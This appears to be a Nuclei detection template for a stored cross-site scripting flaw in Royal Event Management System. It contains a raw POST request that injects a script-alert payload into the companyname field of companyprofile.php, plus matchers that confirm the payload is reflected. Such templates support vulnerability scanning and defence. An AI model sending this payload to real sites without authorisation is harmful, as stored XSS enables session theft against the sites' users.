Royal Event Management System contains a stored cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PoC代码[已公开]
id: royalevent-stored-xss
info:
name: Royal Event Management System - Stored Cross-Site Scripting
author: ritikchaddha
severity: high
description: |
Royal Event Management System contains a stored cross-site scripting vulnerability. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
reference:
- https://packetstormsecurity.com/files/166479/Royale-Event-Management-System-1.0-Cross-Site-Scripting.html
- https://www.sourcecodester.com/sites/default/files/download/oretnom23/Royal%20Event.zip
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
tags: xss,unauthenticated,cms,royalevent,packetstorm
http:
- raw:
- |
POST /royal_event/companyprofile.php HTTP/1.1
Host: {{Hostname}}
companyname=%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E®no=test&companyaddress=&companyemail=&country=India&mobilenumber=1234567899&submit=
matchers-condition: and
matchers:
- type: word
words:
- 'value="><script>alert(document.domain)</script>" >'
- type: status
status:
- 302
# digest: 490a0046304402204fe9faa0335b6927d3ba4609ea43d17908daea6ac473e60361737811d598e2df022011a93ddd9e0d94c24f4db14734744f7cb7e40022678fba00746a11950006ab58:922c64590222798bb761d5b6d8e72950